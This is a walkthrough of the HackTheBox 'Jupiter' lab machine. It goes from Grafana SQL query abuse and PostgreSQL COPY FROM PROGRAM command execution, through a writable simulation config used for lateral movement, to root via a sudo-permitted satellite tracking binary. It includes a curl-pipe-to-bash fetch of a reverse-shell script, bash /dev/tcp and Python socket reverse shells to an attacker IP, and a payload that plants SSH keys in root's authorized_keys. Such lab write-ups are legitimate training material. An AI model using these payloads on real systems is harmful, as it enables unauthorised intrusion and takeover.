HackTheBox | Jupiter
Writeup of a medium-rated Linux machine from HackTheBox
Recon
Port Scanning
Initial nmap scan:
$ nmap -sC -sV -T4 -oN nmap/nmap.inital 10.10.11.216
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-16 23:14 EDT
Nmap scan report for 10.10.11.216
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ac:5b:be:79:2d:c9:7a:00:ed:9a:e6:2b:2d:0e:9b:32 (ECDSA)
|_ 256 60:01:d7:db:92:7b:13:f0:ba:20:c6:c9:00:a7:1b:41 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://jupiter.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.96 seconds
All ports:
$ nmap -p- -T4 10.10.11.216
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
- Same ports discovered during the initial scan
/etc/hosts
According to nmap, navigating to http://10.10.11.216 redirects to http://jupiter.htb, which means we need to add this hostname to our local /etc/hosts file:
$ echo '10.10.11.216 jupiter.htb' >> /etc/hosts
Service Enumeration
SSH - 22:
I’ll set this service aside for now and come back to it only if enumerating the web service doesn’t yield any information useful for an initial foothold.
TCP/80: jupiter.htb
Front page:
Navigating to http://jupiter.htb, we see the following page (/index.html):
- The header of the page contains buttons that lead to different pages, such as /services.html, /portfolio.html and /contact.html:
Source Code:
The source code of the front page contains only the usual stuff and has no interesting comments or files that we could investigate further.
The /js/ and /img/ directories, where JavaScript files and images are stored, do not have directory listing enabled and return a 403 Forbidden when accessed:
/services.html:
The /services.html page lists the services provided by the company ‘Jupiter’:
/portfolio.html:
The /portfolio.html page contains some Juno images:
- Each image is identified by an ID and can be accessed via /img/nasa/<id>.jpg
We might want to fuzz the image ID to see whether there are some hidden images, as sketched below.
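A quick sketch of that idea (the ID range 1-100 is just a guess):
$ seq 1 100 > ids.txt
$ ffuf -u http://jupiter.htb/img/nasa/FUZZ.jpg -w ids.txt -mc 200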
/contact.html:
The /contact.html page contains some contact information:
- Email address: support@jupiter.htb
- Hotline: 1-677-124-44227 • 1-688-356-66889
- Address:
Los Angeles Gournadi, 1230 Bariasl
Fuzzing:
- Fuzzing for files/directories does not reveal anything interesting. However, by fuzzing for virtual hosts using ffuf, I found the virtual host kiosk.jupiter.htb:
ffuf -u http://jupiter.htb -H 'Host: FUZZ.jupiter.htb' -fc 301 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://jupiter.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.jupiter.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 325ms]
* FUZZ: kiosk
:: Progress: [19966/19966] :: Job [1/1] :: 32 req/sec :: Duration: [0:05:18] :: Errors: 1 ::
TCP/80: kiosk.jupiter.htb
Front page:
Before navigating to http://kiosk.jupiter.htb/, let’s add the new virtual host to our /etc/hosts file, as displayed below:
$ echo '10.10.11.216 jupiter.htb kiosk.jupiter.htb' >> /etc/hosts
This virtual host is running a Grafana instance, which is an open-source, highly customizable platform used for monitoring and observability. It provides a way to visualize, analyze and understand metrics and data from various sources in real-time.
The running version is 9.5.2, which is not vulnerable to any critical vulnerability (such as remote code execution) that would allow us to gain a shell on the target system.
/login:
Clicking on the Sign in button at the top right-hand side of the page leads to the login page, where a user can enter a valid username/email and password to log in:
Directory Fuzzing:
Using ffuf, I was able to identify multiple directories/files, but most of them are not really interesting and will not prove useful for this pentest.
ffuf -u http://kiosk.jupiter.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://kiosk.jupiter.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 574ms]
* FUZZ: login
[Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 648ms]
* FUZZ: profile
[Status: 302, Size: 31, Words: 2, Lines: 3, Duration: 626ms]
* FUZZ: public
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 2469ms]
* FUZZ: signup
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 604ms]
* FUZZ: admin
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 197ms]
* FUZZ: plugins
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 626ms]
* FUZZ: live
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 215ms]
* FUZZ: org
[Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 1086ms]
* FUZZ: logout
[Status: 200, Size: 26, Words: 3, Lines: 3, Duration: 638ms]
* FUZZ: robots.txt
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 3524ms]
* FUZZ: explore
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 243ms]
* FUZZ: monitoring
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 633ms]
* FUZZ: verify
[Status: 200, Size: 109728, Words: 3099, Lines: 1380, Duration: 1090ms]
* FUZZ: metrics
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 178ms]
* FUZZ: configuration
[Status: 302, Size: 24, Words: 2, Lines: 3, Duration: 1475ms]
* FUZZ: connections
[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 1080ms]
* FUZZ: styleguide
API queries:
After some time spent trying to find a vulnerability in this web application, I revisited the previous requests that I (and the web application) made, in the HTTP History tab of Burp Suite (I always enable passive interception of requests in the background while manually enumerating a web application), and I found some interesting API calls. When a user navigates to http://kiosk.jupiter.htb, the following requests are made in the background:
- As can be seen, the first request is the GET request to kiosk.jupiter.htb. After that, multiple API requests are issued; the most interesting ones are the POST requests to the /api/ds/query endpoint.
Let’s take the first POST request and analyze it further to see what it does exactly:
- As can be seen, this request is actually executing a SQL query (via the rawSql key) on a PostgreSQL database, and the web application returns the results of the query via the values key:
With that in mind, we can use this endpoint to issue arbitrary SQL queries to the database and probably retrieve sensitive information, such as credentials, to gain a foothold on the server. A sketch of replaying such a request from the command line is shown below.
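This is only a sketch: the datasource uid must be copied from the request intercepted in Burp (shown as a placeholder below), and the exact JSON body may differ slightly between Grafana versions.
$ curl -s -X POST http://kiosk.jupiter.htb/api/ds/query \
    -H 'Content-Type: application/json' \
    -d '{"queries":[{"refId":"A","datasource":{"type":"postgres","uid":"<uid-from-burp>"},"rawSql":"SELECT version();","format":"table"}]}'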
Initial Foothold
Shell as postgres
Interacting with the database
- By referring to this PayloadAllTheThings cheat-sheet, we can perform a proper enumeration of the target PostgreSQL database.
Enumeration: Version
We can enumerate the version by running the SQL query SELECT version():
- As can be seen, the target version of PostgreSQL is 14.8, running on a 64-bit Ubuntu operating system.
Enumeration: Usernames & Password hashes
We can return a list of usernames for all the database users in this PostgreSQL database, by running the command: SELECT usename FROM pg_user;
- There are 2 users: postgres and grafana_viewer
We can also return the password hashes of these 2 users: SELECT usename, passwd FROM pg_shadow;
Enumeration: Database Name
We can get the name of the current database via the command: SELECT current_database();
- The current database is moon_namesdb.
Enumeration: Listing databases
We can get a list of databases via the command SELECT datname FROM pg_database;
Enumeration: Tables
We can get a list of tables names in the current database using the SQL command SELECT table_name FROM information_schema.tables;
- As can be seen, multiple tables are returned. However, the most interesting one is the cmd_exec table, which can be used to execute commands on the server, as shown here.
NOTE: The pg_user table would also be interesting if the passwords were printed, but in this case they are not (they are replaced by asterisks ‘*’).
Running the 'id' command
NOTE: If the cmd_exec table does not exist in your case, you can simply create it by issuing the SQL query CREATE TABLE cmd_exec(cmd_output text); and then continue the exploitation as shown below!
We can run a command by simply issuing the below SQL query:
COPY cmd_exec FROM PROGRAM 'id';
After that, we can get the output of this command by running the SQL query:
SELECT * FROM cmd_exec;
- As can be seen, the PostgreSQL database is running as the postgres user.
Foothold as postgres
We can gain an initial foothold on the box, as postgres, by following the steps below:
1- Create a file named rev.sh that contains the following bash script:
/usr/bin/bash -i >& /dev/tcp/<tun0-IP>/9999 0>&1
2- Start a Python web server on port 80, which will serve the rev.sh file:
python3 -m http.server 80
3- Start a netcat listener on port 9999:
nc -nlvp 9999
4- Execute the following SQL query:
COPY cmd_exec FROM PROGRAM 'curl http://<tun0-IP>/rev.sh | bash';
5- Check your netcat listener:
Inside the box
Shell Stabilization
The stabilization process can be seen in the figure below:
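For reference, a common stabilization sequence (not specific to this box; it assumes python3 is available on the target) looks like this:
postgres@jupiter:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@jupiter:/$ export TERM=xterm
# background the shell with CTRL+Z, then on the attacking machine:
$ stty raw -echo; fg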
Enumeration
- There are 4 users with a console: root, juno, jovian and me (postgres):
postgres@jupiter:~$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
juno:x:1000:1000:juno:/home/juno:/bin/bash
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
jovian:x:1001:1002:,,,:/home/jovian:/bin/bash
- There are no interesting binaries with the SUID bit set.
- The user postgres may not run sudo on the box.
- The /opt directory contains a folder called solar-flares. However, postgres does not have access rights to it; only the user jovian and members of the science group can access it:
- While searching for files/directories owned by other users and at the same time readable or writable by me (postgres), I found an interesting file named network-simulation.yml located in the /dev/shm/ directory:
postgres@jupiter:/$ find / -type f -user juno -readable -writable 2>/dev/null | grep -v 'proc\|usr\|var\|boot'
/dev/shm/network-simulation.yml
- As can be seen, this file is owned by the juno user and is readable/writable by any other user, including postgres.
network-simulation.yml file
Below is the content of this file:
postgres@jupiter:/dev/shm$ cat network-simulation.yml
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/python3
args: -m http.server 80
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/curl
args: -s server
start_time: 5s
- In summary, this is a YAML configuration file which sets up a network simulation with a server and 3 client hosts. The server runs an HTTP server using Python, while the clients use cURL to make requests to the server.
With that in mind, I ran the pspy64 binary to monitor ongoing processes (see the sketch after the next observation), and I noticed that this file is executed with juno privileges every 2 minutes as a shadow simulation using the /home/juno/.local/bin/shadow binary.
- As can be seen, when the YAML configuration file is executed, an HTTP server is launched using Python and requests are made using cURL.
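To reproduce the monitoring step, a minimal sketch (pspy64 is fetched from the attacking machine using the same Python web server trick; <tun0-IP> is a placeholder):
postgres@jupiter:/tmp$ curl http://<tun0-IP>/pspy64 -o pspy64
postgres@jupiter:/tmp$ chmod +x pspy64 && ./pspy64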
Lateral Movement
Shell as juno
Exploiting shadow network simulation config file
Since the user postgres has write permissions over the configuration file /dev/shm/network-simulation.yml, we can modify the YAML configuration file as explained below to gain access as the juno user.
- For the host named ‘server’, set the path key to /usr/bin/cp and the args key to /usr/bin/bash /var/tmp/bash
- For the host named ‘client’, set the path key to /usr/bin/chmod and the args key to u+s /var/tmp/bash
Below is the entire (modified) configuration file:
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/cp
args: /usr/bin/bash /var/tmp/bash
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/chmod
args: u+s /var/tmp/bash
start_time: 5s
This configuration, when executed, will perform the following actions:
- Copy the /usr/bin/bash binary into the /var/tmp/ directory
- Grant the SUID bit to the copied binary /var/tmp/bash, which can then be used to escalate to the juno user via the command /var/tmp/bash -p
Now, all we have to do is wait for the configuration file to be executed, and then we will get a bash session as juno by running the command:
postgres@jupiter:~$ /var/tmp/bash -p
SSH Access (Persistence)
To gain stable, persistent access to the target machine as juno, we can generate an SSH key pair locally (id_rsa and id_rsa.pub), and then add the public key (the content of id_rsa.pub) into the /home/juno/.ssh/authorized_keys file:
1- Generate SSH keys on the attacking machine:
$ ssh-keygen
2- Copy the content of id_rsa.pub:
$ cat id_rsa.pub | xclip -selection clipboard
3- Go back to the target machine and paste the copied public key into the /home/juno/.ssh/authorized_keys file:
juno@jupiter:~$ echo '<paste-here>' >> /home/juno/.ssh/authorized_keys
4- On the attacking machine, run the command below to establish an SSH connection using the private key:
$ ssh -i id_rsa juno@jupiter.htb
Enter passphrase for key 'id_rsa': <Enter the passphrase you set in ssh-keygen, here>
Shell as jovian
Running services
- After gaining access to the box as juno, I checked whether this user can run any binaries with sudo, but a password, which we do not have, is required to get this information.
- After that, I ran the ss -lntp command to view running services on the machine, and I found 3 services listening internally on the localhost interface, as shown in the figure below:
To interact with these services, I did port forwarding via SSH as shown below:
$ ssh -i id_rsa -L 3000:127.0.0.1:3000 -f -N juno@jupiter.htb
Enter passphrase for key 'id_rsa':
$ ssh -i id_rsa -L 5432:127.0.0.1:5432 -f -N juno@jupiter.htb
Enter passphrase for key 'id_rsa':
$ ssh -i id_rsa -L 8888:127.0.0.1:8888 -f -N juno@jupiter.htb
Enter passphrase for key 'id_rsa':
- With this step out of the way, we can enumerate these services on our attacking machine.
Enumeration of services
Running a quick nmap scan against these services, we get the following result:
$ nmap -p8888,5432,3000 127.0.0.1 -sV
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 19:52 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
3000/tcp open ppp?
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8888/tcp open http Tornado httpd 6.2
1- The service on port 3000 is running a Grafana instance (the same version as the Grafana instance running on port 80).
2- The service on port 5432 is running PostgreSQL version 9.6.0 or later. This version is not vulnerable to any critical vulnerability, and we don’t have legitimate credentials to access the database. This is probably the same PostgreSQL database we interacted with to gain a foothold on the box as postgres.
3- The final service, on port 8888, is running a Jupyter Notebook application. Navigating to http://127.0.0.1:8888/, you will be presented with a login page where you need to provide a password or access token in order to reach the dashboard.
Finding the token
The user juno (our user) is a member of the science group, which means we can access the solar-flares folder (which we encountered earlier while enumerating as postgres) inside the /opt directory.
This folder contains some files with the .ipynb extension, which are notebook documents created by Jupyter Notebook itself. There is also a bash script named start, which starts a Jupyter Notebook server without opening a web browser and runs the Jupyter Notebook file flares.ipynb. It also redirects standard error output to a log file in the /opt/solar-flares/logs/ directory.
The logs folder contains multiple log files saved at different timestamps. Each log file contains a token, which is printed to the user each time the Jupyter server is started. With that in mind, the most recently saved log file should contain the current token; in my case it was 2e820a7a74308131cb7bf5e7761eaca866837fb548fd6820 (it might be a different token in your case!).
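As a quick sketch (this assumes the token appears in the usual ‘?token=...’ URL that Jupyter prints at startup, and that the newest log file holds the current one):
juno@jupiter:/opt/solar-flares/logs$ grep -oE 'token=[a-z0-9]+' "$(ls -t | head -n 1)" | head -n 1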
Access Jupyter Notebook Dashboard
We can use this token to access the Jupyter Notebook dashboard:
- As can be seen, we are presented with the files and folders located in the /opt/solar-flares directory, which is the directory from which the notebook was launched.
Code Execution
Jupyter Notebook has a cool feature which allows a user to run code in a wide range of languages. Each notebook is associated with a kernel. If, for example, a notebook is associated with the IPython kernel, we can run Python code within the application. This feature can be used in our favor, as pentesters, to run OS commands as the user who started the notebook.
In this case, the notebook is associated with a Python3 kernel, ipykernel:
By clicking on that button, Python3 (ipykernel), we will be redirected to the interface where we can execute python code:
Let’s, for example, run the whoami command via the Python script below:
import os
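# NOTE: os.system returns the command's exit status, so print(whoami) shows 0;
# the user name comes from the command's own output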
whoami = os.system("whoami")
print(whoami)
- As can be seen, we are running OS commands as the jovian user.
NOTE: You can run the script by pressing the CTRL + ENTER hotkey.
Shell as jovian
We can gain a fully interactive shell, by following the steps below:
1- Start a netcat listener on a port of your choice (e.g. 9997)
$ nc -nlvp 9997
2- Run the python script:
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.126",9997)) # CHANGE THE IP AND PORT
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
3- Check your reverse shell:
Privilege Escalation
Shell as root
Enumeration
- The HOME directory of the user jovian contains only the usual files/directories that you’d see in any HOME directory.
- This user, however, has the permission to run the /usr/local/bin/sattrack binary as root, without providing a password:
'sattrack' binary
Running this binary returns the following message:
jovian@jupiter:~$ sudo /usr/local/bin/sattrack
Satellite Tracking System
Configuration file has not been found. Please try again!
It looks like a ‘Satellite Tracking System’ that needs a configuration file in order to run successfully.
After a quick Google search for this tracking system, I didn’t really find anything alike. I found some old tools with the same name, but their documentation is not properly written, so it’s hard to understand what the tool does and how to provide the configuration file it needs.
Running the strings command on the binary and grepping for config, we see that the binary reads a JSON configuration file inside the /tmp/ directory. If a file with these attributes does not exist, it returns the message: ‘Configuration file has not been found. Please try again!’ (a sketch of this check follows).
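A minimal sketch of that check (the exact matches will vary):
jovian@jupiter:~$ strings /usr/local/bin/sattrack | grep -i config
This is how the /tmp/config.json path used later was identified.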
'sattrack' directory
Every tool must have a config directory. That’s what popped into my head while looking online for this tool. After searching the filesystem for any directory named ‘sattrack’, I found this one:
jovian@jupiter:~$ find / -type d -name sattrack 2>/dev/null
/usr/local/share/sattrack
This directory contains 2 JSON files (one of them is the config file the satellite tracking system needs in order to run) and an image:
config.json file
The config.json file contains the following:
{
"tleroot": "/tmp/tle/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"http://celestrak.org/NORAD/elements/weather.txt",
"http://celestrak.org/NORAD/elements/noaa.txt",
"http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
Here is a breakdown of the key elements in this JSON configuration file:
- tleroot: defines the location from which TLE (Two-Line Element Set) files are loaded. In this file, it is set to /tmp/tle/
- tlefile: defines the TLE filename to load from the tleroot
- tlesources: defines an array of URLs from which the tlefile can be downloaded into the tleroot, using something like cURL
/root/root.txt
With this in mind, we can make this satellite tracking system download the root flag root.txt and put it inside /tmp/tle/, the directory defined in the tleroot key.
This can be achieved by loading the configuration file below:
{
"tleroot": "/tmp/tle/",
"tlefile": "root.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"file:///root/root.txt"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
- The only 2 modified values are:
- tlefile, which is set to root.txt
- tlesources, which is set to an array with a single element defining the location of the root.txt file: file:///root/root.txt
We can save this file as /tmp/config.json and run the sattrack binary with root privileges:
Now the content of /root/root.txt should be inside the /tmp/tle/ directory:
NOTE: I tried to retrieve the SSH private key of the root user (/root/.ssh/id_rsa), but from the output below, it’s safe to assume that the file does not exist.
With this vulnerability, we can read any file on the server, including the /etc/shadow file. We could then attempt to crack the root password hash and, if successful, gain SSH access as root (a sketch of this idea follows).
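A sketch of that approach (reusing the file:// trick; the wordlist path is an assumption based on the usual Kali location):
# In /tmp/config.json, set: "tlesources": ["file:///etc/shadow"] and "tlefile": "shadow"
jovian@jupiter:/tmp$ sudo /usr/local/bin/sattrack
# transfer /tmp/tle/shadow to the attacking machine, then:
$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow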
SSH Access as root
In order to gain SSH access as root on this box, we can write our own SSH public key into the /root/.ssh/authorized_keys file and then SSH in as root using the corresponding private key.
To do so, we can follow the steps below:
1- Generate an SSH key pair using ssh-keygen:
$ ssh-keygen
2- Save the public key id_rsa.pub into a file called authorized_keys:
$ mv id_rsa.pub authorized_keys
3- Start an HTTP server serving the authorized_keys file:
$ python3 -m http.server 80
4- Go back to the target machine, and modify the /tmp/config.json file as shown below:
{
"tleroot": "/root/.ssh/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"http://10.10.14.126/authorized_keys",
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
5- Run the sattrack binary with sudo:
jovian@jupiter:/tmp$ sudo /usr/local/bin/sattrack
6- SSH into the box as root:
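Assuming the key pair generated in step 1, this is simply:
$ ssh -i id_rsa root@jupiter.htb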